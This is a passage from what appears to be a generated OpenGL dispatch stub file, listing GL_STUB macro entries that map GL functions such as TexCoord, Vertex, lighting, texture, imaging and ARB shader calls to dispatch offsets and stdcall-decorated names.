GL_STUB(TexCoord2iv, _gloffset_TexCoord2iv, TexCoord2iv@4)
GL_STUB(TexCoord2s, _gloffset_TexCoord2s, TexCoord2s@8)
GL_STUB(TexCoord2sv, _gloffset_TexCoord2sv, TexCoord2sv@4)
GL_STUB(TexCoord3d, _gloffset_TexCoord3d, TexCoord3d@24)
GL_STUB(TexCoord3dv, _gloffset_TexCoord3dv, TexCoord3dv@4)
GL_STUB(TexCoord3f, _gloffset_TexCoord3f, TexCoord3f@12)
GL_STUB(TexCoord3fv, _gloffset_TexCoord3fv, TexCoord3fv@4)
GL_STUB(TexCoord3i, _gloffset_TexCoord3i, TexCoord3i@12)
GL_STUB(TexCoord3iv, _gloffset_TexCoord3iv, TexCoord3iv@4)
GL_STUB(TexCoord3s, _gloffset_TexCoord3s, TexCoord3s@12)
GL_STUB(TexCoord3sv, _gloffset_TexCoord3sv, TexCoord3sv@4)
GL_STUB(TexCoord4d, _gloffset_TexCoord4d, TexCoord4d@32)
GL_STUB(TexCoord4dv, _gloffset_TexCoord4dv, TexCoord4dv@4)
GL_STUB(TexCoord4f, _gloffset_TexCoord4f, TexCoord4f@16)
GL_STUB(TexCoord4fv, _gloffset_TexCoord4fv, TexCoord4fv@4)
GL_STUB(TexCoord4i, _gloffset_TexCoord4i, TexCoord4i@16)
GL_STUB(TexCoord4iv, _gloffset_TexCoord4iv, TexCoord4iv@4)
GL_STUB(TexCoord4s, _gloffset_TexCoord4s, TexCoord4s@16)
GL_STUB(TexCoord4sv, _gloffset_TexCoord4sv, TexCoord4sv@4)
GL_STUB(Vertex2d, _gloffset_Vertex2d, Vertex2d@16)
GL_STUB(Vertex2dv, _gloffset_Vertex2dv, Vertex2dv@4)
GL_STUB(Vertex2f, _gloffset_Vertex2f, Vertex2f@8)
GL_STUB(Vertex2fv, _gloffset_Vertex2fv, Vertex2fv@4)
GL_STUB(Vertex2i, _gloffset_Vertex2i, Vertex2i@8)
GL_STUB(Vertex2iv, _gloffset_Vertex2iv, Vertex2iv@4)
GL_STUB(Vertex2s, _gloffset_Vertex2s, Vertex2s@8)
GL_STUB(Vertex2sv, _gloffset_Vertex2sv, Vertex2sv@4)
GL_STUB(Vertex3d, _gloffset_Vertex3d, Vertex3d@24)
GL_STUB(Vertex3dv, _gloffset_Vertex3dv, Vertex3dv@4)
GL_STUB(Vertex3f, _gloffset_Vertex3f, Vertex3f@12)
GL_STUB(Vertex3fv, _gloffset_Vertex3fv, Vertex3fv@4)
GL_STUB(Vertex3i, _gloffset_Vertex3i, Vertex3i@12)
GL_STUB(Vertex3iv, _gloffset_Vertex3iv, Vertex3iv@4)
GL_STUB(Vertex3s, _gloffset_Vertex3s, Vertex3s@12)
GL_STUB(Vertex3sv, _gloffset_Vertex3sv, Vertex3sv@4)
GL_STUB(Vertex4d, _gloffset_Vertex4d, Vertex4d@32)
GL_STUB(Vertex4dv, _gloffset_Vertex4dv, Vertex4dv@4)
GL_STUB(Vertex4f, _gloffset_Vertex4f, Vertex4f@16)
GL_STUB(Vertex4fv, _gloffset_Vertex4fv, Vertex4fv@4)
GL_STUB(Vertex4i, _gloffset_Vertex4i, Vertex4i@16)
GL_STUB(Vertex4iv, _gloffset_Vertex4iv, Vertex4iv@4)
GL_STUB(Vertex4s, _gloffset_Vertex4s, Vertex4s@16)
GL_STUB(Vertex4sv, _gloffset_Vertex4sv, Vertex4sv@4)
GL_STUB(ClipPlane, _gloffset_ClipPlane, ClipPlane@8)
GL_STUB(ColorMaterial, _gloffset_ColorMaterial, ColorMaterial@8)
GL_STUB(CullFace, _gloffset_CullFace, CullFace@4)
GL_STUB(Fogf, _gloffset_Fogf, Fogf@8)
GL_STUB(Fogfv, _gloffset_Fogfv, Fogfv@8)
GL_STUB(Fogi, _gloffset_Fogi, Fogi@8)
GL_STUB(Fogiv, _gloffset_Fogiv, Fogiv@8)
GL_STUB(FrontFace, _gloffset_FrontFace, FrontFace@4)
GL_STUB(Hint, _gloffset_Hint, Hint@8)
GL_STUB(Lightf, _gloffset_Lightf, Lightf@12)
GL_STUB(Lightfv, _gloffset_Lightfv, Lightfv@12)
GL_STUB(Lighti, _gloffset_Lighti, Lighti@12)
GL_STUB(Lightiv, _gloffset_Lightiv, Lightiv@12)
GL_STUB(LightModelf, _gloffset_LightModelf, LightModelf@8)
GL_STUB(LightModelfv, _gloffset_LightModelfv, LightModelfv@8)
GL_STUB(LightModeli, _gloffset_LightModeli, LightModeli@8)
GL_STUB(LightModeliv, _gloffset_LightModeliv, LightModeliv@8)
GL_STUB(LineStipple, _gloffset_LineStipple, LineStipple@8)
GL_STUB(LineWidth, _gloffset_LineWidth, LineWidth@4)
GL_STUB(Materialf, _gloffset_Materialf, Materialf@12)
GL_STUB(Materialfv, _gloffset_Materialfv, Materialfv@12)
GL_STUB(Materiali, _gloffset_Materiali, Materiali@12)
GL_STUB(Materialiv, _gloffset_Materialiv, Materialiv@12)
GL_STUB(PointSize, _gloffset_PointSize, PointSize@4)
GL_STUB(PolygonMode, _gloffset_PolygonMode, PolygonMode@8)
GL_STUB(PolygonStipple, _gloffset_PolygonStipple, PolygonStipple@4)
GL_STUB(Scissor, _gloffset_Scissor, Scissor@16)
GL_STUB(ShadeModel, _gloffset_ShadeModel, ShadeModel@4)
GL_STUB(TexParameterf, _gloffset_TexParameterf, TexParameterf@12)
GL_STUB(TexParameterfv, _gloffset_TexParameterfv, TexParameterfv@12)
GL_STUB(TexParameteri, _gloffset_TexParameteri, TexParameteri@12)
GL_STUB(TexParameteriv, _gloffset_TexParameteriv, TexParameteriv@12)
GL_STUB(TexImage1D, _gloffset_TexImage1D, TexImage1D@32)
GL_STUB(TexImage2D, _gloffset_TexImage2D, TexImage2D@36)
GL_STUB(TexEnvf, _gloffset_TexEnvf, TexEnvf@12)
GL_STUB(TexEnvfv, _gloffset_TexEnvfv, TexEnvfv@12)
GL_STUB(TexEnvi, _gloffset_TexEnvi, TexEnvi@12)
GL_STUB(TexEnviv, _gloffset_TexEnviv, TexEnviv@12)
GL_STUB(TexGend, _gloffset_TexGend, TexGend@16)
GL_STUB(TexGendv, _gloffset_TexGendv, TexGendv@12)
GL_STUB(TexGenf, _gloffset_TexGenf, TexGenf@12)
GL_STUB(TexGenfv, _gloffset_TexGenfv, TexGenfv@12)
GL_STUB(TexGeni, _gloffset_TexGeni, TexGeni@12)
GL_STUB(TexGeniv, _gloffset_TexGeniv, TexGeniv@12)
GL_STUB(FeedbackBuffer, _gloffset_FeedbackBuffer, FeedbackBuffer@12)
GL_STUB(SelectBuffer, _gloffset_SelectBuffer, SelectBuffer@8)
GL_STUB(RenderMode, _gloffset_RenderMode, RenderMode@4)
GL_STUB(InitNames, _gloffset_InitNames, InitNames@0)
GL_STUB(LoadName, _gloffset_LoadName, LoadName@4)
GL_STUB(PassThrough, _gloffset_PassThrough, PassThrough@4)
GL_STUB(PopName, _gloffset_PopName, PopName@0)
GL_STUB(PushName, _gloffset_PushName, PushName@4)
GL_STUB(DrawBuffer, _gloffset_DrawBuffer, DrawBuffer@4)
GL_STUB(Clear, _gloffset_Clear, Clear@4)
GL_STUB(ClearAccum, _gloffset_ClearAccum, ClearAccum@16)
GL_STUB(ClearIndex, _gloffset_ClearIndex, ClearIndex@4)
GL_STUB(ClearColor, _gloffset_ClearColor, ClearColor@16)
GL_STUB(ClearStencil, _gloffset_ClearStencil, ClearStencil@4)
GL_STUB(ClearDepth, _gloffset_ClearDepth, ClearDepth@8)
GL_STUB(StencilMask, _gloffset_StencilMask, StencilMask@4)
GL_STUB(ColorMask, _gloffset_ColorMask, ColorMask@16)
GL_STUB(DepthMask, _gloffset_DepthMask, DepthMask@4)
GL_STUB(IndexMask, _gloffset_IndexMask, IndexMask@4)
GL_STUB(Accum, _gloffset_Accum, Accum@8)
GL_STUB(Disable, _gloffset_Disable, Disable@4)
GL_STUB(Enable, _gloffset_Enable, Enable@4)
GL_STUB(Finish, _gloffset_Finish, Finish@0)
GL_STUB(Flush, _gloffset_Flush, Flush@0)
GL_STUB(PopAttrib, _gloffset_PopAttrib, PopAttrib@0)
GL_STUB(PushAttrib, _gloffset_PushAttrib, PushAttrib@4)
GL_STUB(Map1d, _gloffset_Map1d, Map1d@32)
GL_STUB(Map1f, _gloffset_Map1f, Map1f@24)
GL_STUB(Map2d, _gloffset_Map2d, Map2d@56)
GL_STUB(Map2f, _gloffset_Map2f, Map2f@40)
GL_STUB(MapGrid1d, _gloffset_MapGrid1d, MapGrid1d@20)
GL_STUB(MapGrid1f, _gloffset_MapGrid1f, MapGrid1f@12)
GL_STUB(MapGrid2d, _gloffset_MapGrid2d, MapGrid2d@40)
GL_STUB(MapGrid2f, _gloffset_MapGrid2f, MapGrid2f@24)
GL_STUB(EvalCoord1d, _gloffset_EvalCoord1d, EvalCoord1d@8)
GL_STUB(EvalCoord1dv, _gloffset_EvalCoord1dv, EvalCoord1dv@4)
GL_STUB(EvalCoord1f, _gloffset_EvalCoord1f, EvalCoord1f@4)
GL_STUB(EvalCoord1fv, _gloffset_EvalCoord1fv, EvalCoord1fv@4)
GL_STUB(EvalCoord2d, _gloffset_EvalCoord2d, EvalCoord2d@16)
GL_STUB(EvalCoord2dv, _gloffset_EvalCoord2dv, EvalCoord2dv@4)
GL_STUB(EvalCoord2f, _gloffset_EvalCoord2f, EvalCoord2f@8)
GL_STUB(EvalCoord2fv, _gloffset_EvalCoord2fv, EvalCoord2fv@4)
GL_STUB(EvalMesh1, _gloffset_EvalMesh1, EvalMesh1@12)
GL_STUB(EvalPoint1, _gloffset_EvalPoint1, EvalPoint1@4)
GL_STUB(EvalMesh2, _gloffset_EvalMesh2, EvalMesh2@20)
GL_STUB(EvalPoint2, _gloffset_EvalPoint2, EvalPoint2@8)
GL_STUB(AlphaFunc, _gloffset_AlphaFunc, AlphaFunc@8)
GL_STUB(BlendFunc, _gloffset_BlendFunc, BlendFunc@8)
GL_STUB(LogicOp, _gloffset_LogicOp, LogicOp@4)
GL_STUB(StencilFunc, _gloffset_StencilFunc, StencilFunc@12)
GL_STUB(StencilOp, _gloffset_StencilOp, StencilOp@12)
GL_STUB(DepthFunc, _gloffset_DepthFunc, DepthFunc@4)
GL_STUB(PixelZoom, _gloffset_PixelZoom, PixelZoom@8)
GL_STUB(PixelTransferf, _gloffset_PixelTransferf, PixelTransferf@8)
GL_STUB(PixelTransferi, _gloffset_PixelTransferi, PixelTransferi@8)
GL_STUB(PixelStoref, _gloffset_PixelStoref, PixelStoref@8)
GL_STUB(PixelStorei, _gloffset_PixelStorei, PixelStorei@8)
GL_STUB(PixelMapfv, _gloffset_PixelMapfv, PixelMapfv@12)
GL_STUB(PixelMapuiv, _gloffset_PixelMapuiv, PixelMapuiv@12)
GL_STUB(PixelMapusv, _gloffset_PixelMapusv, PixelMapusv@12)
GL_STUB(ReadBuffer, _gloffset_ReadBuffer, ReadBuffer@4)
GL_STUB(CopyPixels, _gloffset_CopyPixels, CopyPixels@20)
GL_STUB(ReadPixels, _gloffset_ReadPixels, ReadPixels@28)
GL_STUB(DrawPixels, _gloffset_DrawPixels, DrawPixels@20)
GL_STUB(GetBooleanv, _gloffset_GetBooleanv, GetBooleanv@8)
GL_STUB(GetClipPlane, _gloffset_GetClipPlane, GetClipPlane@8)
GL_STUB(GetDoublev, _gloffset_GetDoublev, GetDoublev@8)
GL_STUB(GetError, _gloffset_GetError, GetError@0)
GL_STUB(GetFloatv, _gloffset_GetFloatv, GetFloatv@8)
GL_STUB(GetIntegerv, _gloffset_GetIntegerv, GetIntegerv@8)
GL_STUB(GetLightfv, _gloffset_GetLightfv, GetLightfv@12)
GL_STUB(GetLightiv, _gloffset_GetLightiv, GetLightiv@12)
GL_STUB(GetMapdv, _gloffset_GetMapdv, GetMapdv@12)
GL_STUB(GetMapfv, _gloffset_GetMapfv, GetMapfv@12)
GL_STUB(GetMapiv, _gloffset_GetMapiv, GetMapiv@12)
GL_STUB(GetMaterialfv, _gloffset_GetMaterialfv, GetMaterialfv@12)
GL_STUB(GetMaterialiv, _gloffset_GetMaterialiv, GetMaterialiv@12)
GL_STUB(GetPixelMapfv, _gloffset_GetPixelMapfv, GetPixelMapfv@8)
GL_STUB(GetPixelMapuiv, _gloffset_GetPixelMapuiv, GetPixelMapuiv@8)
GL_STUB(GetPixelMapusv, _gloffset_GetPixelMapusv, GetPixelMapusv@8)
GL_STUB(GetPolygonStipple, _gloffset_GetPolygonStipple, GetPolygonStipple@4)
GL_STUB(GetString, _gloffset_GetString, GetString@4)
GL_STUB(GetTexEnvfv, _gloffset_GetTexEnvfv, GetTexEnvfv@12)
GL_STUB(GetTexEnviv, _gloffset_GetTexEnviv, GetTexEnviv@12)
GL_STUB(GetTexGendv, _gloffset_GetTexGendv, GetTexGendv@12)
GL_STUB(GetTexGenfv, _gloffset_GetTexGenfv, GetTexGenfv@12)
GL_STUB(GetTexGeniv, _gloffset_GetTexGeniv, GetTexGeniv@12)
GL_STUB(GetTexImage, _gloffset_GetTexImage, GetTexImage@20)
GL_STUB(GetTexParameterfv, _gloffset_GetTexParameterfv, GetTexParameterfv@12)
GL_STUB(GetTexParameteriv, _gloffset_GetTexParameteriv, GetTexParameteriv@12)
GL_STUB(GetTexLevelParameterfv, _gloffset_GetTexLevelParameterfv, GetTexLevelParameterfv@16)
GL_STUB(GetTexLevelParameteriv, _gloffset_GetTexLevelParameteriv, GetTexLevelParameteriv@16)
GL_STUB(IsEnabled, _gloffset_IsEnabled, IsEnabled@4)
GL_STUB(IsList, _gloffset_IsList, IsList@4)
GL_STUB(DepthRange, _gloffset_DepthRange, DepthRange@16)
GL_STUB(Frustum, _gloffset_Frustum, Frustum@48)
GL_STUB(LoadIdentity, _gloffset_LoadIdentity, LoadIdentity@0)
GL_STUB(LoadMatrixf, _gloffset_LoadMatrixf, LoadMatrixf@4)
GL_STUB(LoadMatrixd, _gloffset_LoadMatrixd, LoadMatrixd@4)
GL_STUB(MatrixMode, _gloffset_MatrixMode, MatrixMode@4)
GL_STUB(MultMatrixf, _gloffset_MultMatrixf, MultMatrixf@4)
GL_STUB(MultMatrixd, _gloffset_MultMatrixd, MultMatrixd@4)
GL_STUB(Ortho, _gloffset_Ortho, Ortho@48)
GL_STUB(PopMatrix, _gloffset_PopMatrix, PopMatrix@0)
GL_STUB(PushMatrix, _gloffset_PushMatrix, PushMatrix@0)
GL_STUB(Rotated, _gloffset_Rotated, Rotated@32)
GL_STUB(Rotatef, _gloffset_Rotatef, Rotatef@16)
GL_STUB(Scaled, _gloffset_Scaled, Scaled@24)
GL_STUB(Scalef, _gloffset_Scalef, Scalef@12)
GL_STUB(Translated, _gloffset_Translated, Translated@24)
GL_STUB(Translatef, _gloffset_Translatef, Translatef@12)
GL_STUB(Viewport, _gloffset_Viewport, Viewport@16)
GL_STUB(ArrayElement, _gloffset_ArrayElement, ArrayElement@4)
GL_STUB(BindTexture, _gloffset_BindTexture, BindTexture@8)
GL_STUB(ColorPointer, _gloffset_ColorPointer, ColorPointer@16)
GL_STUB(DisableClientState, _gloffset_DisableClientState, DisableClientState@4)
GL_STUB(DrawArrays, _gloffset_DrawArrays, DrawArrays@12)
GL_STUB(DrawElements, _gloffset_DrawElements, DrawElements@16)
GL_STUB(EdgeFlagPointer, _gloffset_EdgeFlagPointer, EdgeFlagPointer@8)
GL_STUB(EnableClientState, _gloffset_EnableClientState, EnableClientState@4)
GL_STUB(IndexPointer, _gloffset_IndexPointer, IndexPointer@12)
GL_STUB(Indexub, _gloffset_Indexub, Indexub@4)
GL_STUB(Indexubv, _gloffset_Indexubv, Indexubv@4)
GL_STUB(InterleavedArrays, _gloffset_InterleavedArrays, InterleavedArrays@12)
GL_STUB(NormalPointer, _gloffset_NormalPointer, NormalPointer@12)
GL_STUB(PolygonOffset, _gloffset_PolygonOffset, PolygonOffset@8)
GL_STUB(TexCoordPointer, _gloffset_TexCoordPointer, TexCoordPointer@16)
GL_STUB(VertexPointer, _gloffset_VertexPointer, VertexPointer@16)
GL_STUB(AreTexturesResident, _gloffset_AreTexturesResident, AreTexturesResident@12)
GL_STUB(CopyTexImage1D, _gloffset_CopyTexImage1D, CopyTexImage1D@28)
GL_STUB(CopyTexImage2D, _gloffset_CopyTexImage2D, CopyTexImage2D@32)
GL_STUB(CopyTexSubImage1D, _gloffset_CopyTexSubImage1D, CopyTexSubImage1D@24)
GL_STUB(CopyTexSubImage2D, _gloffset_CopyTexSubImage2D, CopyTexSubImage2D@32)
GL_STUB(DeleteTextures, _gloffset_DeleteTextures, DeleteTextures@8)
GL_STUB(GenTextures, _gloffset_GenTextures, GenTextures@8)
GL_STUB(GetPointerv, _gloffset_GetPointerv, GetPointerv@8)
GL_STUB(IsTexture, _gloffset_IsTexture, IsTexture@4)
GL_STUB(PrioritizeTextures, _gloffset_PrioritizeTextures, PrioritizeTextures@12)
GL_STUB(TexSubImage1D, _gloffset_TexSubImage1D, TexSubImage1D@28)
GL_STUB(TexSubImage2D, _gloffset_TexSubImage2D, TexSubImage2D@36)
GL_STUB(PopClientAttrib, _gloffset_PopClientAttrib, PopClientAttrib@0)
GL_STUB(PushClientAttrib, _gloffset_PushClientAttrib, PushClientAttrib@4)
GL_STUB(BlendColor, _gloffset_BlendColor, BlendColor@16)
GL_STUB(BlendEquation, _gloffset_BlendEquation, BlendEquation@4)
GL_STUB(DrawRangeElements, _gloffset_DrawRangeElements, DrawRangeElements@24)
GL_STUB(ColorTable, _gloffset_ColorTable, ColorTable@24)
GL_STUB(ColorTableParameterfv, _gloffset_ColorTableParameterfv, ColorTableParameterfv@12)
GL_STUB(ColorTableParameteriv, _gloffset_ColorTableParameteriv, ColorTableParameteriv@12)
GL_STUB(CopyColorTable, _gloffset_CopyColorTable, CopyColorTable@20)
GL_STUB(GetColorTable, _gloffset_GetColorTable, GetColorTable@16)
GL_STUB(GetColorTableParameterfv, _gloffset_GetColorTableParameterfv, GetColorTableParameterfv@12)
GL_STUB(GetColorTableParameteriv, _gloffset_GetColorTableParameteriv, GetColorTableParameteriv@12)
GL_STUB(ColorSubTable, _gloffset_ColorSubTable, ColorSubTable@24)
GL_STUB(CopyColorSubTable, _gloffset_CopyColorSubTable, CopyColorSubTable@20)
GL_STUB(ConvolutionFilter1D, _gloffset_ConvolutionFilter1D, ConvolutionFilter1D@24)
GL_STUB(ConvolutionFilter2D, _gloffset_ConvolutionFilter2D, ConvolutionFilter2D@28)
GL_STUB(ConvolutionParameterf, _gloffset_ConvolutionParameterf, ConvolutionParameterf@12)
GL_STUB(ConvolutionParameterfv, _gloffset_ConvolutionParameterfv, ConvolutionParameterfv@12)
GL_STUB(ConvolutionParameteri, _gloffset_ConvolutionParameteri, ConvolutionParameteri@12)
GL_STUB(ConvolutionParameteriv, _gloffset_ConvolutionParameteriv, ConvolutionParameteriv@12)
GL_STUB(CopyConvolutionFilter1D, _gloffset_CopyConvolutionFilter1D, CopyConvolutionFilter1D@20)
GL_STUB(CopyConvolutionFilter2D, _gloffset_CopyConvolutionFilter2D, CopyConvolutionFilter2D@24)
GL_STUB(GetConvolutionFilter, _gloffset_GetConvolutionFilter, GetConvolutionFilter@16)
GL_STUB(GetConvolutionParameterfv, _gloffset_GetConvolutionParameterfv, GetConvolutionParameterfv@12)
GL_STUB(GetConvolutionParameteriv, _gloffset_GetConvolutionParameteriv, GetConvolutionParameteriv@12)
GL_STUB(GetSeparableFilter, _gloffset_GetSeparableFilter, GetSeparableFilter@24)
GL_STUB(SeparableFilter2D, _gloffset_SeparableFilter2D, SeparableFilter2D@32)
GL_STUB(GetHistogram, _gloffset_GetHistogram, GetHistogram@20)
GL_STUB(GetHistogramParameterfv, _gloffset_GetHistogramParameterfv, GetHistogramParameterfv@12)
GL_STUB(GetHistogramParameteriv, _gloffset_GetHistogramParameteriv, GetHistogramParameteriv@12)
GL_STUB(GetMinmax, _gloffset_GetMinmax, GetMinmax@20)
GL_STUB(GetMinmaxParameterfv, _gloffset_GetMinmaxParameterfv, GetMinmaxParameterfv@12)
GL_STUB(GetMinmaxParameteriv, _gloffset_GetMinmaxParameteriv, GetMinmaxParameteriv@12)
GL_STUB(Histogram, _gloffset_Histogram, Histogram@16)
GL_STUB(Minmax, _gloffset_Minmax, Minmax@12)
GL_STUB(ResetHistogram, _gloffset_ResetHistogram, ResetHistogram@4)
GL_STUB(ResetMinmax, _gloffset_ResetMinmax, ResetMinmax@4)
GL_STUB(TexImage3D, _gloffset_TexImage3D, TexImage3D@40)
GL_STUB(TexSubImage3D, _gloffset_TexSubImage3D, TexSubImage3D@44)
GL_STUB(CopyTexSubImage3D, _gloffset_CopyTexSubImage3D, CopyTexSubImage3D@36)
GL_STUB(ActiveTextureARB, _gloffset_ActiveTextureARB, ActiveTextureARB@4)
GL_STUB(ClientActiveTextureARB, _gloffset_ClientActiveTextureARB, ClientActiveTextureARB@4)
GL_STUB(MultiTexCoord1dARB, _gloffset_MultiTexCoord1dARB, MultiTexCoord1dARB@12)
GL_STUB(MultiTexCoord1dvARB, _gloffset_MultiTexCoord1dvARB, MultiTexCoord1dvARB@8)
GL_STUB(MultiTexCoord1fARB, _gloffset_MultiTexCoord1fARB, MultiTexCoord1fARB@8)
GL_STUB(MultiTexCoord1fvARB, _gloffset_MultiTexCoord1fvARB, MultiTexCoord1fvARB@8)
GL_STUB(MultiTexCoord1iARB, _gloffset_MultiTexCoord1iARB, MultiTexCoord1iARB@8)
GL_STUB(MultiTexCoord1ivARB, _gloffset_MultiTexCoord1ivARB, MultiTexCoord1ivARB@8)
GL_STUB(MultiTexCoord1sARB, _gloffset_MultiTexCoord1sARB, MultiTexCoord1sARB@8)
GL_STUB(MultiTexCoord1svARB, _gloffset_MultiTexCoord1svARB, MultiTexCoord1svARB@8)
GL_STUB(MultiTexCoord2dARB, _gloffset_MultiTexCoord2dARB, MultiTexCoord2dARB@20)
GL_STUB(MultiTexCoord2dvARB, _gloffset_MultiTexCoord2dvARB, MultiTexCoord2dvARB@8)
GL_STUB(MultiTexCoord2fARB, _gloffset_MultiTexCoord2fARB, MultiTexCoord2fARB@12)
GL_STUB(MultiTexCoord2fvARB, _gloffset_MultiTexCoord2fvARB, MultiTexCoord2fvARB@8)
GL_STUB(MultiTexCoord2iARB, _gloffset_MultiTexCoord2iARB, MultiTexCoord2iARB@12)
GL_STUB(MultiTexCoord2ivARB, _gloffset_MultiTexCoord2ivARB, MultiTexCoord2ivARB@8)
GL_STUB(MultiTexCoord2sARB, _gloffset_MultiTexCoord2sARB, MultiTexCoord2sARB@12)
GL_STUB(MultiTexCoord2svARB, _gloffset_MultiTexCoord2svARB, MultiTexCoord2svARB@8)
GL_STUB(MultiTexCoord3dARB, _gloffset_MultiTexCoord3dARB, MultiTexCoord3dARB@28)
GL_STUB(MultiTexCoord3dvARB, _gloffset_MultiTexCoord3dvARB, MultiTexCoord3dvARB@8)
GL_STUB(MultiTexCoord3fARB, _gloffset_MultiTexCoord3fARB, MultiTexCoord3fARB@16)
GL_STUB(MultiTexCoord3fvARB, _gloffset_MultiTexCoord3fvARB, MultiTexCoord3fvARB@8)
GL_STUB(MultiTexCoord3iARB, _gloffset_MultiTexCoord3iARB, MultiTexCoord3iARB@16)
GL_STUB(MultiTexCoord3ivARB, _gloffset_MultiTexCoord3ivARB, MultiTexCoord3ivARB@8)
GL_STUB(MultiTexCoord3sARB, _gloffset_MultiTexCoord3sARB, MultiTexCoord3sARB@16)
GL_STUB(MultiTexCoord3svARB, _gloffset_MultiTexCoord3svARB, MultiTexCoord3svARB@8)
GL_STUB(MultiTexCoord4dARB, _gloffset_MultiTexCoord4dARB, MultiTexCoord4dARB@36)
GL_STUB(MultiTexCoord4dvARB, _gloffset_MultiTexCoord4dvARB, MultiTexCoord4dvARB@8)
GL_STUB(MultiTexCoord4fARB, _gloffset_MultiTexCoord4fARB, MultiTexCoord4fARB@20)
GL_STUB(MultiTexCoord4fvARB, _gloffset_MultiTexCoord4fvARB, MultiTexCoord4fvARB@8)
GL_STUB(MultiTexCoord4iARB, _gloffset_MultiTexCoord4iARB, MultiTexCoord4iARB@20)
GL_STUB(MultiTexCoord4ivARB, _gloffset_MultiTexCoord4ivARB, MultiTexCoord4ivARB@8)
GL_STUB(MultiTexCoord4sARB, _gloffset_MultiTexCoord4sARB, MultiTexCoord4sARB@20)
GL_STUB(MultiTexCoord4svARB, _gloffset_MultiTexCoord4svARB, MultiTexCoord4svARB@8)
GL_STUB(AttachShader, _gloffset_AttachShader, AttachShader@8)
GL_STUB(CreateProgram, _gloffset_CreateProgram, CreateProgram@0)
GL_STUB(CreateShader, _gloffset_CreateShader, CreateShader@4)
GL_STUB(DeleteProgram, _gloffset_DeleteProgram, DeleteProgram@4)
GL_STUB(DeleteShader, _gloffset_DeleteShader, DeleteShader@4)
GL_STUB(DetachShader, _gloffset_DetachShader, DetachShader@8)
GL_STUB(GetAttachedShaders, _gloffset_GetAttachedShaders, GetAttachedShaders@16)
GL_STUB(GetProgramInfoLog, _gloffset_GetProgramInfoLog, GetProgramInfoLog@16)
GL_STUB(GetProgramiv, _gloffset_GetProgramiv, GetProgramiv@12)
GL_STUB(GetShaderInfoLog, _gloffset_GetShaderInfoLog, GetShaderInfoLog@16)
GL_STUB(GetShaderiv, _gloffset_GetShaderiv, GetShaderiv@12)
GL_STUB(IsProgram, _gloffset_IsProgram, IsProgram@4)
GL_STUB(IsShader, _gloffset_IsShader, IsShader@4)
GL_STUB(StencilFuncSeparate, _gloffset_StencilFuncSeparate, StencilFuncSeparate@16)
GL_STUB(StencilMaskSeparate, _gloffset_StencilMaskSeparate, StencilMaskSeparate@8)
GL_STUB(StencilOpSeparate, _gloffset_StencilOpSeparate, StencilOpSeparate@16)
GL_STUB(UniformMatrix2x3fv, _gloffset_UniformMatrix2x3fv, UniformMatrix2x3fv@16)
GL_STUB(UniformMatrix2x4fv, _gloffset_UniformMatrix2x4fv, UniformMatrix2x4fv@16)
GL_STUB(UniformMatrix3x2fv, _gloffset_UniformMatrix3x2fv, UniformMatrix3x2fv@16)
GL_STUB(UniformMatrix3x4fv, _gloffset_UniformMatrix3x4fv, UniformMatrix3x4fv@16)
GL_STUB(UniformMatrix4x2fv, _gloffset_UniformMatrix4x2fv, UniformMatrix4x2fv@16)
GL_STUB(UniformMatrix4x3fv, _gloffset_UniformMatrix4x3fv, UniformMatrix4x3fv@16)
GL_STUB(LoadTransposeMatrixdARB, _gloffset_LoadTransposeMatrixdARB, LoadTransposeMatrixdARB@4)
GL_STUB(LoadTransposeMatrixfARB, _gloffset_LoadTransposeMatrixfARB, LoadTransposeMatrixfARB@4)
GL_STUB(MultTransposeMatrixdARB, _gloffset_MultTransposeMatrixdARB, MultTransposeMatrixdARB@4)
GL_STUB(MultTransposeMatrixfARB, _gloffset_MultTransposeMatrixfARB, MultTransposeMatrixfARB@4)
GL_STUB(SampleCoverageARB, _gloffset_SampleCoverageARB, SampleCoverageARB@8)
GL_STUB(CompressedTexImage1DARB, _gloffset_CompressedTexImage1DARB, CompressedTexImage1DARB@28)
GL_STUB(CompressedTexImage2DARB, _gloffset_CompressedTexImage2DARB, CompressedTexImage2DARB@32)
GL_STUB(CompressedTexImage3DARB, _gloffset_CompressedTexImage3DARB, CompressedTexImage3DARB@36)
GL_STUB(CompressedTexSubImage1DARB, _gloffset_CompressedTexSubImage1DARB, CompressedTexSubImage1DARB@28)
GL_STUB(CompressedTexSubImage2DARB, _gloffset_CompressedTexSubImage2DARB, CompressedTexSubImage2DARB@36)
GL_STUB(CompressedTexSubImage3DARB, _gloffset_CompressedTexSubImage3DARB, CompressedTexSubImage3DARB@44)
GL_STUB(GetCompressedTexImageARB, _gloffset_GetCompressedTexImageARB, GetCompressedTexImageARB@12)
GL_STUB(DisableVertexAttribArrayARB, _gloffset_DisableVertexAttribArrayARB, DisableVertexAttribArrayARB@4)
GL_STUB(EnableVertexAttribArrayARB, _gloffset_EnableVertexAttribArrayARB, EnableVertexAttribArrayARB@4)
GL_STUB(GetProgramEnvParameterdvARB, _gloffset_GetProgramEnvParameterdvARB, GetProgramEnvParameterdvARB@12)
GL_STUB(GetProgramEnvParameterfvARB, _gloffset_GetProgramEnvParameterfvARB, GetProgramEnvParameterfvARB@12)
GL_STUB(GetProgramLocalParameterdvARB, _gloffset_GetProgramLocalParameterdvARB, GetProgramLocalParameterdvARB@12)
GL_STUB(GetProgramLocalParameterfvARB, _gloffset_GetProgramLocalParameterfvARB, GetProgramLocalParameterfvARB@12)
GL_STUB(GetProgramStringARB, _gloffset_GetProgramStringARB, GetProgramStringARB@12)
GL_STUB(GetProgramivARB, _gloffset_GetProgramivARB, GetProgramivARB@12)
GL_STUB(GetVertexAttribdvARB, _gloffset_GetVertexAttribdvARB, GetVertexAttribdvARB@12)
GL_STUB(GetVertexAttribfvARB, _gloffset_GetVertexAttribfvARB, GetVertexAttribfvARB@12)
GL_STUB(GetVertexAttribivARB, _gloffset_GetVertexAttribivARB, GetVertexAttribivARB@12)
GL_STUB(ProgramEnvParameter4dARB, _gloffset_ProgramEnvParameter4dARB, ProgramEnvParameter4dARB@40)
GL_STUB(ProgramEnvParameter4dvARB, _gloffset_ProgramEnvParameter4dvARB, ProgramEnvParameter4dvARB@12)
GL_STUB(ProgramEnvParameter4fARB, _gloffset_ProgramEnvParameter4fARB, ProgramEnvParameter4fARB@24)
GL_STUB(ProgramEnvParameter4fvARB, _gloffset_ProgramEnvParameter4fvARB, ProgramEnvParameter4fvARB@12)
GL_STUB(ProgramLocalParameter4dARB, _gloffset_ProgramLocalParameter4dARB, ProgramLocalParameter4dARB@40)
GL_STUB(ProgramLocalParameter4dvARB, _gloffset_ProgramLocalParameter4dvARB, ProgramLocalParameter4dvARB@12)
